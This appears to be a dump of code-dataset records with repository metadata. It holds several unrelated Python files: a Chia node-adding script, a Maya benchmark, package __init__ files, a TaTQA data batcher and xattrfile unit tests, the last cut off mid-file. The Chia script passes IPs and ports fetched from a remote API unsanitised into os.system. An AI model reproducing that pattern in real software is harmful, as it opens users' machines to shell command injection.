00ebc72f09f65a456c0a3a660dd0b75cd3aafb51
|
[
"Unlicense"
] | null | null | null |
add.py
|
mockupcode/chia-add-node
|
00ebc72f09f65a456c0a3a660dd0b75cd3aafb51
|
[
"Unlicense"
] | null | null | null |
add.py
|
mockupcode/chia-add-node
|
00ebc72f09f65a456c0a3a660dd0b75cd3aafb51
|
[
"Unlicense"
] | null | null | null |
import requests
import json
import os
response = json.loads(requests.get("https://chia.powerlayout.com/nodes?block_height=true&geoip=true").text)
for node in response['nodes']:
chia_node = node['ip'] + ":" + node['port']
os.system("chia show -a " + chia_node)
import requests
import json
import os
response = json.loads(requests.get("https://chia.powerlayout.com/nodes?block_height=true&geoip=true").text)
for node in response['nodes']:
chia_node = node['ip'] + ":" + node['port']
os.system("chia show -a " + chia_node)
| 30.941176
| 107
| 0.714829
| 80
| 526
| 4.625
| 0.3125
| 0.086486
| 0.108108
| 0.12973
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.110266
| 526
| 16
| 108
| 32.875
| 0.790598
| 0
| 0
| 1
| 0
| 0
| 0.334601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.428571
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
0d2a774ade57f07a82646032d0c0ce0d096f4bca
| 3,970
|
py
|
Python
|
benchmarks/OpenMaya/bench_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 24
|
2017-01-11T15:57:46.000Z
|
2020-09-23T06:18:30.000Z
|
benchmarks/OpenMaya/bench_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | null | null | null |
benchmarks/OpenMaya/bench_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 2
|
2017-03-06T23:52:08.000Z
|
2020-09-23T06:19:03.000Z
|
#!/usr/bin/env mayapy
import os
import sys
import unittest
import maya.standalone
import revl
from maya import OpenMaya
_HERE = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(_HERE, *((os.pardir,) * 2))))
import bana
import benchmarks._preset
bana.initialize()
maya.standalone.initialize()
def _retrieveDeepestDagPath():
dagPath = OpenMaya.MDagPath()
iterator = OpenMaya.MItDag()
iterator.traverseUnderWorld(True)
while not iterator.isDone():
if iterator.depth() > dagPath.pathCount():
iterator.getPath(dagPath)
iterator.next()
return dagPath
class MDagPathDeepSceneBench(unittest.TestCase):
@classmethod
def setUpClass(cls):
OpenMaya.MFileIO.newFile(True)
revl.run(benchmarks._preset.DEEP, 10000, seed=1.23)
def benchBnFind1(self):
for _ in OpenMaya.MDagPath.bnFind():
pass
def benchBnFind2(self):
for _ in OpenMaya.MDagPath.bnFind(copy=False):
pass
def benchBnFind3(self):
for _ in OpenMaya.MDagPath.bnFind(recursive=False):
pass
def benchBnFind4(self):
for _ in OpenMaya.MDagPath.bnFind(recursive=False, copy=False):
pass
def benchBnFind5(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*'):
pass
def benchBnFind6(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*', copy=False):
pass
def benchBnFind7(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False):
pass
def benchBnFind8(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False,
copy=False):
pass
def benchBnFind9(self):
dagPath = _retrieveDeepestDagPath()
dagPath.pop(1)
pattern = '%s|*' % (dagPath.fullPathName(),)
for _ in OpenMaya.MDagPath.bnFind(pattern=pattern):
pass
def benchBnFind10(self):
dagPath = _retrieveDeepestDagPath()
dagPath.pop(1)
pattern = '%s|*' % (dagPath.fullPathName(),)
for _ in OpenMaya.MDagPath.bnFind(pattern=pattern, copy=False):
pass
def benchBnFind11(self):
dagPath = _retrieveDeepestDagPath()
dagPath.pop(1)
pattern = '%s|*' % (dagPath.fullPathName(),)
for _ in OpenMaya.MDagPath.bnFind(pattern=pattern, recursive=False):
pass
def benchBnFind12(self):
dagPath = _retrieveDeepestDagPath()
dagPath.pop(1)
pattern = '%s|*' % (dagPath.fullPathName(),)
for _ in OpenMaya.MDagPath.bnFind(pattern=pattern, recursive=False,
copy=False):
pass
class MDagPathFlatSceneBench(unittest.TestCase):
@classmethod
def setUpClass(cls):
OpenMaya.MFileIO.newFile(True)
revl.run(benchmarks._preset.FLAT, 10000, seed=1.23)
def benchBnFind1(self):
for _ in OpenMaya.MDagPath.bnFind():
pass
def benchBnFind2(self):
for _ in OpenMaya.MDagPath.bnFind(copy=False):
pass
def benchBnFind3(self):
for _ in OpenMaya.MDagPath.bnFind(recursive=False):
pass
def benchBnFind4(self):
for _ in OpenMaya.MDagPath.bnFind(recursive=False, copy=False):
pass
def benchBnFind5(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*'):
pass
def benchBnFind6(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*', copy=False):
pass
def benchBnFind7(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False):
pass
def benchBnFind8(self):
for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False,
copy=False):
pass
if __name__ == '__main__':
from benchmarks.run import run
run('__main__')
| 26.644295
| 77
| 0.610579
| 402
| 3,970
| 5.915423
| 0.21393
| 0.141295
| 0.109336
| 0.176619
| 0.757359
| 0.731707
| 0.724979
| 0.724979
| 0.724979
| 0.724979
| 0
| 0.01574
| 0.279849
| 3,970
| 148
| 78
| 26.824324
| 0.81602
| 0.005038
| 0
| 0.669725
| 0
| 0
| 0.010129
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.211009
| false
| 0.183486
| 0.082569
| 0
| 0.321101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b4b86fd4066f75eafe3b9477eb2fc2bf54c9440d
| 269
|
py
|
Python
|
finmarketpy/backtest/__init__.py
|
aidowu1/finmarketpy
|
1ceee46bb5378ee46d8270fc604acf474ae32739
|
[
"Apache-2.0"
] | 1,701
|
2016-08-17T15:45:40.000Z
|
2022-03-30T14:05:21.000Z
|
finmarketpy/backtest/__init__.py
|
mhockenberger/finmarketpy
|
2a20026877153aa048896632457dcfb20f65c0b0
|
[
"Apache-2.0"
] | 26
|
2017-01-09T18:54:27.000Z
|
2021-06-29T15:32:03.000Z
|
finmarketpy/backtest/__init__.py
|
mhockenberger/finmarketpy
|
2a20026877153aa048896632457dcfb20f65c0b0
|
[
"Apache-2.0"
] | 342
|
2016-09-01T11:36:00.000Z
|
2022-03-27T00:56:55.000Z
|
__author__ = 'saeedamen'
from finmarketpy.backtest.backtestengine import Backtest
from finmarketpy.backtest.backtestrequest import BacktestRequest
from finmarketpy.backtest.backtestengine import TradingModel
from finmarketpy.backtest.tradeanalysis import TradeAnalysis
| 44.833333
| 64
| 0.888476
| 26
| 269
| 9.038462
| 0.384615
| 0.255319
| 0.391489
| 0.314894
| 0.365957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070632
| 269
| 6
| 65
| 44.833333
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b4e4534679886cfddb9d1d07fa70f9d6176e0f45
| 12,339
|
py
|
Python
|
tag_op/data/tatqa_batch_gen.py
|
huwarr/TAT-QA
|
2ae9d2ad869a6eebcc79c15d5f300644e5e31e66
|
[
"MIT"
] | 23
|
2021-05-25T06:01:21.000Z
|
2022-02-27T07:16:45.000Z
|
tag_op/data/tatqa_batch_gen.py
|
huwarr/TAT-QA
|
2ae9d2ad869a6eebcc79c15d5f300644e5e31e66
|
[
"MIT"
] | 5
|
2021-07-28T08:41:51.000Z
|
2022-03-08T08:08:42.000Z
|
tag_op/data/tatqa_batch_gen.py
|
huwarr/TAT-QA
|
2ae9d2ad869a6eebcc79c15d5f300644e5e31e66
|
[
"MIT"
] | 12
|
2021-06-13T13:20:29.000Z
|
2022-03-28T14:11:00.000Z
|
import os
import pickle
import torch
import random
class TaTQABatchGen(object):
def __init__(self, args, data_mode, encoder='roberta'):
dpath = f"tagop_{encoder}_cached_{data_mode}.pkl"
self.is_train = data_mode == "train"
self.args = args
with open(os.path.join(args.data_dir, dpath), 'rb') as f:
print("Load data from {}.".format(dpath))
data = pickle.load(f)
all_data = []
for item in data:
input_ids = torch.from_numpy(item["input_ids"])
attention_mask = torch.from_numpy(item["attention_mask"])
token_type_ids = torch.from_numpy(item["token_type_ids"])
paragraph_mask = torch.from_numpy(item["paragraph_mask"])
table_mask = torch.from_numpy(item["table_mask"])
paragraph_numbers = item["paragraph_number_value"]
table_cell_numbers = item["table_cell_number_value"]
paragraph_index = torch.from_numpy(item["paragraph_index"])
table_cell_index = torch.from_numpy(item["table_cell_index"])
tag_labels = torch.from_numpy(item["tag_labels"])
operator_labels = torch.tensor(item["operator_label"])
scale_labels = torch.tensor(item["scale_label"])
number_order_labels = torch.tensor(item["number_order_label"])
gold_answers = item["answer_dict"]
paragraph_tokens = item["paragraph_tokens"]
table_cell_tokens = item["table_cell_tokens"]
question_id = item["question_id"]
all_data.append((input_ids, attention_mask, token_type_ids, paragraph_mask, table_mask, paragraph_index,
table_cell_index, tag_labels, operator_labels, scale_labels, number_order_labels, gold_answers,
paragraph_tokens, table_cell_tokens, paragraph_numbers, table_cell_numbers, question_id))
print("Load data size {}.".format(len(all_data)))
self.data = TaTQABatchGen.make_batches(all_data, args.batch_size if self.is_train else args.eval_batch_size,
self.is_train)
self.offset = 0
@staticmethod
def make_batches(data, batch_size=32, is_train=True):
if is_train:
random.shuffle(data)
if is_train:
return [
data[i: i + batch_size] if i + batch_size < len(data) else data[i:] + data[
:i + batch_size - len(data)]
for i in range(0, len(data), batch_size)]
return [data[i:i + batch_size] for i in range(0, len(data), batch_size)]
def reset(self):
if self.is_train:
indices = list(range(len(self.data)))
random.shuffle(indices)
self.data = [self.data[i] for i in indices]
for i in range(len(self.data)):
random.shuffle(self.data[i])
self.offset = 0
def __len__(self):
return len(self.data)
def __iter__(self):
while self.offset < len(self):
batch = self.data[self.offset]
self.offset += 1
input_ids_batch, attention_mask_batch, token_type_ids_batch, paragraph_mask_batch, table_mask_batch, \
paragraph_index_batch, table_cell_index_batch, tag_labels_batch, operator_labels_batch, scale_labels_batch, \
number_order_labels_batch, gold_answers_batch, paragraph_tokens_batch, \
table_cell_tokens_batch, paragraph_numbers_batch, table_cell_numbers_batch, question_ids_batch = zip(*batch)
bsz = len(batch)
input_ids = torch.LongTensor(bsz, 512)
attention_mask = torch.LongTensor(bsz, 512)
token_type_ids = torch.LongTensor(bsz, 512).fill_(0)
paragraph_mask = torch.LongTensor(bsz, 512)
table_mask = torch.LongTensor(bsz, 512)
paragraph_index = torch.LongTensor(bsz, 512)
table_cell_index = torch.LongTensor(bsz, 512)
tag_labels = torch.LongTensor(bsz, 512)
operator_labels = torch.LongTensor(bsz)
scale_labels = torch.LongTensor(bsz)
number_order_labels = torch.LongTensor(bsz)
paragraph_tokens = []
table_cell_tokens = []
gold_answers = []
question_ids = []
paragraph_numbers = []
table_cell_numbers = []
for i in range(bsz):
input_ids[i] = input_ids_batch[i]
attention_mask[i] = attention_mask_batch[i]
token_type_ids[i] = token_type_ids_batch[i]
paragraph_mask[i] = paragraph_mask_batch[i]
table_mask[i] = table_mask_batch[i]
paragraph_index[i] = paragraph_index_batch[i]
table_cell_index[i] = table_cell_index_batch[i]
tag_labels[i] = tag_labels_batch[i]
operator_labels[i] = operator_labels_batch[i]
scale_labels[i] = scale_labels_batch[i]
number_order_labels[i] = number_order_labels_batch[i]
paragraph_tokens.append(paragraph_tokens_batch[i])
table_cell_tokens.append(table_cell_tokens_batch[i])
paragraph_numbers.append(paragraph_numbers_batch[i])
table_cell_numbers.append(table_cell_numbers_batch[i])
gold_answers.append(gold_answers_batch[i])
question_ids.append(question_ids_batch[i])
out_batch = {"input_ids": input_ids, "attention_mask": attention_mask, "token_type_ids":token_type_ids,
"paragraph_mask": paragraph_mask, "paragraph_index": paragraph_index, "tag_labels": tag_labels,
"operator_labels": operator_labels, "scale_labels": scale_labels, "number_order_labels": number_order_labels,
"paragraph_tokens": paragraph_tokens, "table_cell_tokens": table_cell_tokens, "paragraph_numbers": paragraph_numbers,
"table_cell_numbers": table_cell_numbers, "gold_answers": gold_answers, "question_ids": question_ids,
"table_mask": table_mask, "table_cell_index":table_cell_index,
}
if self.args.cuda:
for k in out_batch.keys():
if isinstance(out_batch[k], torch.Tensor):
out_batch[k] = out_batch[k].cuda()
yield out_batch
class TaTQATestBatchGen(object):
def __init__(self, args, data_mode, encoder='roberta'):
dpath = f"tagop_{encoder}_cached_{data_mode}.pkl"
self.is_train = data_mode == "train"
self.args = args
print(os.path.join(args.test_data_dir, dpath))
with open(os.path.join(args.test_data_dir, dpath), 'rb') as f:
print("Load data from {}.".format(dpath))
data = pickle.load(f)
all_data = []
for item in data:
input_ids = torch.from_numpy(item["input_ids"])
attention_mask = torch.from_numpy(item["attention_mask"])
token_type_ids = torch.from_numpy(item["token_type_ids"])
paragraph_mask = torch.from_numpy(item["paragraph_mask"])
table_mask = torch.from_numpy(item["table_mask"])
paragraph_numbers = item["paragraph_number_value"]
table_cell_numbers = item["table_cell_number_value"]
paragraph_index = torch.from_numpy(item["paragraph_index"])
table_cell_index = torch.from_numpy(item["table_cell_index"])
tag_labels = torch.from_numpy(item["tag_labels"])
gold_answers = item["answer_dict"]
paragraph_tokens = item["paragraph_tokens"]
table_cell_tokens = item["table_cell_tokens"]
question_id = item["question_id"]
all_data.append((input_ids, attention_mask, token_type_ids, paragraph_mask, table_mask, paragraph_index,
table_cell_index, tag_labels, gold_answers, paragraph_tokens, table_cell_tokens,
paragraph_numbers, table_cell_numbers, question_id))
print("Load data size {}.".format(len(all_data)))
self.data = TaTQATestBatchGen.make_batches(all_data, args.batch_size if self.is_train else args.eval_batch_size,
self.is_train)
self.offset = 0
@staticmethod
def make_batches(data, batch_size=32, is_train=True):
if is_train:
random.shuffle(data)
if is_train:
return [
data[i: i + batch_size] if i + batch_size < len(data) else data[i:] + data[
:i + batch_size - len(data)]
for i in range(0, len(data), batch_size)]
return [data[i:i + batch_size] for i in range(0, len(data), batch_size)]
def reset(self):
if self.is_train:
indices = list(range(len(self.data)))
random.shuffle(indices)
self.data = [self.data[i] for i in indices]
for i in range(len(self.data)):
random.shuffle(self.data[i])
self.offset = 0
def __len__(self):
return len(self.data)
def __iter__(self):
while self.offset < len(self):
batch = self.data[self.offset]
self.offset += 1
input_ids_batch, attention_mask_batch, token_type_ids_batch, paragraph_mask_batch, table_mask_batch, \
paragraph_index_batch, table_cell_index_batch, tag_labels_batch, gold_answers_batch, paragraph_tokens_batch, \
table_cell_tokens_batch, paragraph_numbers_batch, table_cell_numbers_batch, question_ids_batch = zip(*batch)
bsz = len(batch)
input_ids = torch.LongTensor(bsz, 512)
attention_mask = torch.LongTensor(bsz, 512)
token_type_ids = torch.LongTensor(bsz, 512).fill_(0)
paragraph_mask = torch.LongTensor(bsz, 512)
table_mask = torch.LongTensor(bsz, 512)
paragraph_index = torch.LongTensor(bsz, 512)
table_cell_index = torch.LongTensor(bsz, 512)
tag_labels = torch.LongTensor(bsz, 512)
paragraph_tokens = []
table_cell_tokens = []
gold_answers = []
question_ids = []
paragraph_numbers = []
table_cell_numbers = []
for i in range(bsz):
input_ids[i] = input_ids_batch[i]
attention_mask[i] = attention_mask_batch[i]
token_type_ids[i] = token_type_ids_batch[i]
paragraph_mask[i] = paragraph_mask_batch[i]
table_mask[i] = table_mask_batch[i]
paragraph_index[i] = paragraph_index_batch[i]
table_cell_index[i] = table_cell_index_batch[i]
tag_labels[i] = tag_labels_batch[i]
paragraph_tokens.append(paragraph_tokens_batch[i])
table_cell_tokens.append(table_cell_tokens_batch[i])
paragraph_numbers.append(paragraph_numbers_batch[i])
table_cell_numbers.append(table_cell_numbers_batch[i])
gold_answers.append(gold_answers_batch[i])
question_ids.append(question_ids_batch[i])
out_batch = {"input_ids": input_ids, "attention_mask": attention_mask, "token_type_ids": token_type_ids,
"paragraph_mask": paragraph_mask, "paragraph_index": paragraph_index, "tag_labels": tag_labels,
"paragraph_tokens": paragraph_tokens, "table_cell_tokens": table_cell_tokens,
"paragraph_numbers": paragraph_numbers,
"table_cell_numbers": table_cell_numbers, "gold_answers": gold_answers, "question_ids": question_ids,
"table_mask": table_mask, "table_cell_index": table_cell_index,
# "paragraph_mapping_content": paragraph_mapping_content,
# "table_mapping_content": table_mapping_content,
}
if self.args.cuda:
for k in out_batch.keys():
if isinstance(out_batch[k], torch.Tensor):
out_batch[k] = out_batch[k].cuda()
yield out_batch
| 52.730769
| 133
| 0.609044
| 1,477
| 12,339
| 4.714963
| 0.07109
| 0.069787
| 0.04911
| 0.041356
| 0.923894
| 0.911689
| 0.898478
| 0.898478
| 0.891585
| 0.891585
| 0
| 0.007366
| 0.29581
| 12,339
| 234
| 134
| 52.730769
| 0.794107
| 0.008348
| 0
| 0.846512
| 0
| 0
| 0.086399
| 0.013569
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.018605
| 0.009302
| 0.102326
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c294687cff49dde4cfd4c5ae0ee394995ad200c
| 78
|
py
|
Python
|
apex/apex/contrib/transducer/__init__.py
|
DominickZhang/Distillation-Swin-Transformer
|
6fc7b25bd558edb14e6f15715f53612c37e5166f
|
[
"MIT"
] | 1
|
2022-02-27T11:21:54.000Z
|
2022-02-27T11:21:54.000Z
|
apex/apex/contrib/transducer/__init__.py
|
DominickZhang/Distillation-Swin-Transformer
|
6fc7b25bd558edb14e6f15715f53612c37e5166f
|
[
"MIT"
] | 1
|
2022-02-23T14:43:58.000Z
|
2022-02-23T14:43:58.000Z
|
apex/apex/contrib/transducer/__init__.py
|
DominickZhang/Distillation-Swin-Transformer
|
6fc7b25bd558edb14e6f15715f53612c37e5166f
|
[
"MIT"
] | 2
|
2021-07-07T21:47:34.000Z
|
2021-07-07T21:53:17.000Z
|
from .transducer import TransducerJoint
from .transducer import TransducerLoss
| 39
| 39
| 0.884615
| 8
| 78
| 8.625
| 0.625
| 0.405797
| 0.57971
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089744
| 78
| 2
| 40
| 39
| 0.971831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2595c18ca7e6030d892e6ef99ffb89715994ea31
| 14,040
|
py
|
Python
|
tests/test_basic.py
|
metwork-framework/xattrfile
|
ab9b0d9e74f24c3ee05827e811430f80f1f7faf2
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_basic.py
|
metwork-framework/xattrfile
|
ab9b0d9e74f24c3ee05827e811430f80f1f7faf2
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T13:24:35.000Z
|
2022-01-12T08:49:27.000Z
|
tests/test_basic.py
|
metwork-framework/xattrfile
|
ab9b0d9e74f24c3ee05827e811430f80f1f7faf2
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from mockredis import mock_redis_client
from unittest import TestCase
from xattrfile import XattrFile
from functools import partial
RED = None
def unittests_get_redis_callable():
global RED
if RED is None:
RED = mock_redis_client()
return RED
def make_xattrfile(filepath):
return XattrFile(filepath, get_redis_callable=unittests_get_redis_callable)
class BasicTestCase(TestCase):
def setUp(self):
self.test_data_dir_path = os.path.join(os.path.dirname(__file__),
'data')
unittests_get_redis_callable().flushdb()
def test_02_write_tags(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x._write_tags()
y = make_xattrfile(test_data_file_path)
self.assertEqual(y.tags['key1'], b'value1')
def test_03_file_not_found(self):
errno = 0
strerror = ''
try:
make_xattrfile(u'data/test_file_missing.json')
except IOError as io_excep:
errno = io_excep.errno
strerror = io_excep.strerror
self.assertEqual(errno, 2)
self.assertEqual(strerror, 'No such file or directory')
def test_05_write_no_tags(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
x = make_xattrfile(test_data_file_path)
x._write_tags()
r = x.get_redis_callable()
self.assertFalse(r.exists(x._redis_key))
def test_06_copy_file_tags(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
self.assertEqual(y.tags['key1'], b'value1')
os.unlink(tmp_data_file_path)
def test_07_copy_tags_on(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
test_data_file2_path = os.path.join(self.test_data_dir_path,
u'test_fileb.json')
x = make_xattrfile(test_data_file_path)
x.tags['foo'] = b'bar'
y = x.copy_tags_on(test_data_file2_path)
self.assertEqual(y.tags['foo'], b'bar')
def test_08_rename_file_tags(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp2_data_file_path = os.path.join(self.test_data_dir_path,
'test2_file.tmp')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
y.rename(tmp2_data_file_path)
y = make_xattrfile(tmp2_data_file_path)
self.assertEqual(y.tags['key1'], b'value1')
os.unlink(tmp2_data_file_path)
def test_09_delete_file(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
y.delete()
self.assertFalse(os.path.isfile(tmp_data_file_path))
def test_10_basename(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
x = make_xattrfile(test_data_file_path)
self.assertEqual(x.basename(), u'test_file.json')
def test_11_rename_file_no_tags(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp2_data_file_path = os.path.join(self.test_data_dir_path,
'test2_file.tmp')
x = make_xattrfile(test_data_file_path)
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
y.rename(tmp2_data_file_path)
y = make_xattrfile(tmp2_data_file_path)
self.assertEqual(len(x.tags), 0)
os.unlink(tmp2_data_file_path)
def test_13_rename_file_path(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp2_data_file_path = os.path.join(self.test_data_dir_path,
'test2_file.tmp')
x = make_xattrfile(test_data_file_path)
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
y.rename(tmp2_data_file_path)
self.assertEqual(y.filepath, tmp2_data_file_path)
os.unlink(tmp2_data_file_path)
def test_14_move_or_copy(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
u'test_file.tmp2')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
r1, r2 = y.move_or_copy(tmp_data_file_path2)
self.assertTrue(r1)
self.assertTrue(r2)
self.assertFalse(os.path.isfile(tmp_data_file_path))
self.assertTrue(os.path.isfile(tmp_data_file_path2))
self.assertEqual(make_xattrfile(
tmp_data_file_path2).tags['key1'], b'value1')
make_xattrfile(tmp_data_file_path2).delete()
def test_14_move_or_copy2(self):
def os_rename_fake(old_os_rename, src_exception, dst_exception,
src, dst):
if src == src_exception:
if dst == dst_exception:
raise OSError("fake rename error")
res = old_os_rename(src, dst)
return res
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
u'test_file.tmp2')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
old_os_rename = os.rename
os.rename = partial(os_rename_fake, old_os_rename,
y.filepath, tmp_data_file_path2)
r1, r2 = y.move_or_copy(tmp_data_file_path2)
os.rename = old_os_rename
self.assertTrue(r1)
self.assertFalse(r2)
self.assertFalse(os.path.isfile(tmp_data_file_path))
self.assertTrue(os.path.isfile(tmp_data_file_path2))
self.assertEqual(make_xattrfile(
tmp_data_file_path2).tags['key1'], b'value1')
self.assertEqual(y.tags['key1'], b'value1')
make_xattrfile(tmp_data_file_path2).delete()
def test_14_hardlink_or_copy(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
u'test_file.tmp2')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
r1, r2 = y.hardlink_or_copy(tmp_data_file_path2)
self.assertTrue(r1)
self.assertTrue(r2)
self.assertTrue(os.path.isfile(tmp_data_file_path))
self.assertTrue(os.path.isfile(tmp_data_file_path2))
self.assertEqual(make_xattrfile(
tmp_data_file_path2).tags['key1'], b'value1')
make_xattrfile(tmp_data_file_path).delete()
make_xattrfile(tmp_data_file_path2).delete()
def test_14_hardlink_or_copy2(self):
def os_link_fake(old_os_link, src_exception, dst_exception,
src, dst):
if src == src_exception:
if dst == dst_exception:
raise OSError("fake link error")
res = old_os_link(src, dst)
return res
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
u'test_file.tmp2')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
old_os_link = os.link
os.link = partial(os_link_fake, old_os_link,
y.filepath, tmp_data_file_path2 + ".t")
r1, r2 = y.hardlink_or_copy(tmp_data_file_path2)
os.link = old_os_link
self.assertTrue(r1)
self.assertFalse(r2)
self.assertTrue(os.path.isfile(tmp_data_file_path))
self.assertTrue(os.path.isfile(tmp_data_file_path2))
self.assertEqual(make_xattrfile(
tmp_data_file_path2).tags['key1'], b'value1')
make_xattrfile(tmp_data_file_path2).delete()
def test_14_hardlink_or_copy3(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
u'test_file.tmp2')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
r1, r2 = y.hardlink_or_copy(tmp_data_file_path2)
self.assertTrue(r1)
self.assertTrue(r2)
self.assertTrue(os.path.isfile(tmp_data_file_path))
self.assertTrue(os.path.isfile(tmp_data_file_path2))
self.assertEqual(make_xattrfile(
tmp_data_file_path2).tags['key1'], b'value1')
make_xattrfile(tmp_data_file_path2).delete()
make_xattrfile(tmp_data_file_path).delete()
def test_15_read_tags(self):
# Set tag manually in Redis, read tags and test if correctly read
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
x = make_xattrfile(test_data_file_path)
r = x.get_redis_callable()
r.hset(x._redis_key, 'rick', 'morty')
x._read_tags()
self.assertEqual(x.tags['rick'], b'morty')
def test_16_delete_redis_empty(self):
